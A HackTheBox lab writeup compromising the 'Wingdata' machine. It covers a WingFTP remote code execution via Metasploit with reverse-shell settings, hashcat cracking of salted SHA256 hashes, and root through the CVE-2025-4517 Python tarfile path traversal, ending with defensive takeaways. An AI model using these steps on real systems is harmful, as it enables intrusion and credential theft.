Wingdata HTB Writeup: Exploiting WingFTP RCE & CVE-2025-4517 for Root Access

Overview

  • Difficulty: Easy
  • Platform: HackTheBox
  • Focus Areas: Web Enumeration, Subdomain Discovery, RCE, Credential Cracking, Privilege Escalation, Python CVE Exploitation

This writeup walks through my full approach to compromising the Wingdata machine. The box revolves around multiple misconfigurations and vulnerabilities across different services, including a WingFTP server, weakly protected credentials, and a Python tarfile path traversal vulnerability. By combining thorough enumeration, hash cracking, and a CVE-based exploit, I was able to escalate from initial web access to full root compromise.

None
Image: HackTheBox WingData

Enumeration & Reconnaissance

Initial Network Scanning

I started with Nmap to map the target's services:

None
Nmap Output

Findings:

  • SSH (port 22)
  • HTTP (port 80)

To make further testing easier, I added the target to my /etc/hosts:

None
Adding Host

Virtual Host Discovery

Visiting http://wingdata.htb initially appeared to be a standard webpage. However, inspecting the page source revealed a reference to a subdomain:

None
Page Sources

Adding this to /etc/hosts allowed access:

None
Adding Vhost

Navigating to http://ftp.wingdata.htb revealed a WingFTP Server login page with a version number clearly displayed. This version information became crucial for the next step.

None
WingFTP Login Page

Initial Access: WingFTP RCE Exploitation

Vulnerability Research

Googling the WingFTP version revealed a Remote Code Execution (RCE) vulnerability that allows unauthenticated command execution.

None
WingFTP Version Exploit

Exploitation with Metasploit

Using Metasploit Framework, I loaded the appropriate exploit module:

None
Metasploit Search Output
msf6> set RHOSTS ftp.wingdata.htb
msf6> set LHOST tun0
msf6> set LPORT 4444
msf6> run
None
Spawned Shell

This yielded a limited shell. The current user had no access to the user flag, indicating the need for lateral movement.

Lateral Movement: Credential Cracking

User Enumeration

Inspecting /etc/passwd revealed another user:

None
User Enumeration

The goal became compromising this account.

Configuration File Enumeration

Further exploration revealed configuration files containing password hashes.

None
User Configuration Files
None
User Password Hash

A particularly valuable file, settings.xml, documented that the hashes were:

  • SHA256
  • Salted with "WingFTP"
None
SHA256+Salt

Hash Cracking with Hashcat

I compiled all hashes with their salt into a file formatted for Hashcat:

None
All Hashes with Salts

Then ran Hashcat:

hashcat -m 1420 -a 0 hashes.txt rockyou.txt

The password for the wacky user was successfully cracked.

None
Hashcat Output

Gaining User Access

With valid credentials, I SSH'd into the machine, this provided access to the user flag:

None
User Flag
User Flag: 228c965be2452ae6a28ddfc1a8f769fb

Privilege Escalation: CVE-2025–4517

Sudo Enumeration

I ran linpeas.sh as wacky, which revealed a sudo privilege:

None
LinPEAS Output

The combination of wildcard arguments and NOPASSWD presented a potential vulnerability vector.

Vulnerable Script Analysis

Examining /opt/backup_clients/restore_backup_clients.py, I found the critical section:

None
Python File Code Snippet

Observations:

  • backup_path is user-controlled.
  • The script extracts archives as root.
  • filter="data" is intended to block dangerous paths.
  • /opt/backup_clients/backups/ is writable by wacky.

CVE-2025–4517: Python Tarfile Path Traversal

This vulnerability affects Python 3.8.0–3.13.1 (target runs Python 3.12.3).

  • The filter parameter is supposed to prevent symlinks and path traversal.
  • However, if a path exceeds PATH_MAX (4096 bytes), os.path.realpath() fails to fully resolve symlinks, returning a "safe-looking" path.
  • This allows arbitrary filesystem writes outside the intended extraction directory.

Exploitation

I leveraged a publicly available exploit for CVE-2025–4517 targeting Python's tarfile module. The exploit takes advantage of the filter="data" bypass in Python 3.12.3 to achieve path traversal. Using the script, I executed the vulnerable backup restoration script as root, which allowed me to gain root access, from which I retrieved the root flag at:

None
Root Flag
Root Flag: 2b988934c03b0d28fe930af2fe74cdae

Key Takeaways

  • Enumeration: Always inspect page sources for subdomains; virtual host discovery is often overlooked.
  • Credential Security: Never hardcode salts in configuration files or use weak salts like "WingFTP".
  • Sudo Misconfigurations: Wildcard arguments with NOPASSWD can be extremely dangerous, especially when combined with user-writable directories.
  • Library Vulnerabilities: Stay updated on CVEs affecting core libraries. The filter parameter in Python's tarfile module is not a silver bullet.
  • Python Version Patching: Upgrade to Python 3.13.2+ to fully mitigate path traversal vulnerabilities in tarfile extraction.

Conclusion

This machine demonstrates how multiple minor vulnerabilities and misconfigurations can be chained together into a full compromise:

  • Web and virtual host enumeration revealing a vulnerable WingFTP server
  • Remote Code Execution on WingFTP to gain initial access
  • Discovery of user hashes in configuration files
  • Cracking SHA256 salted hashes to move laterally to another user
  • Writable directories combined with wildcard sudo privileges
  • Exploitation of Python tarfile path traversal (CVE-2025-4517) for root access

By carefully enumerating each service, analyzing exposed credentials, and leveraging known library vulnerabilities, it was possible to escalate from limited web access to full root control of the machine.